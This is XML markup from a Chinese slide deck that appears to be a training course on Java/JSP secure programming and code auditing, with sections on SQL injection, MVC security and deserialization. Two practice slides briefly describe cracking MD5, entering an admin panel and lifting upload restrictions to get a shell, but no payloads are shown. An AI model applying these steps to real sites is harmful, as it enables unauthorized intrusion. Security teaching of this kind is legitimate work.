            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>和POST方式提交的参数都能过获取到的）：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3291205" y="62230"/>
            <a:ext cx="2561590" cy="501904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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>破MD5，进后台改上传文件扩展名限制拿shell都一气呵成了：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="785495" y="1630045"/>
            <a:ext cx="5647690" cy="2637790"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>SQL注入</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>简单实战</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>GETSHELL: </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3005455" y="571500"/>
            <a:ext cx="3933190" cy="3999865"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC安全</a:t>
            </a:r>
            <a:endParaRPr>
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="内容占位符 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="80000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>初识MVC：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>传统的开发存在结构混乱易用性差耦合度高可维护性差等多种问题，为了</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>解决这些毛病分层思想和MVC框架就出现了。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>MVC是三个单词的缩写,分别为： 模型(Model),视图(View) 和控制(Controller)。 </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Model层实现系统中的业务逻辑，通常可以用JavaBean或EJB来实现。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>View*层用于与用户的交互，通常用JSP来实现(前面有讲到，JavaWeb项目中如果</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>不采用JSP作为展现层完全可以没有任何JSP文件，甚至是过滤一切JSP请求，</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>JEECMS是一个最为典型的案例)。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Controller层是Model与View之间沟通的桥梁，它可以分派用户的请求并选择恰当</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的视图用于显示，同时它也可以解释用户的输入并将它们映射为模型层可执行的操</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>作。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2000">
              <a:sym typeface="+mn-ea"/>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22012</Words>
  <Application>WPS 演示</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>1364</Paragraphs>
  <Slides>137</Slides>
  <Notes>0</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137</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="143" baseType="lpstr">
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Office 主题</vt:lpstr>
      <vt:lpstr>Java、JSP安全编程与代码审计</vt:lpstr>
      <vt:lpstr>JavaEE 基础</vt:lpstr>
      <vt:lpstr>JavaEE 基础</vt:lpstr>
      <vt:lpstr>JavaEE 基础</vt:lpstr>
      <vt:lpstr>JavaEE 基础</vt:lpstr>
      <vt:lpstr>JavaEE 基础</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>CS交互安全</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>SQL注入</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>MVC安全</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>Java反序列化漏洞</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>china</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Windows 用户</dc:creator>
  <cp:lastModifiedBy>D0sd4y</cp:lastModifiedBy>
  <cp:revision>128</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2016-03-08T07:43:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-05-30T10:44:29Z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2052-10.1.0.6490</vt:lpwstr>
  </property>
</Properties>
</file>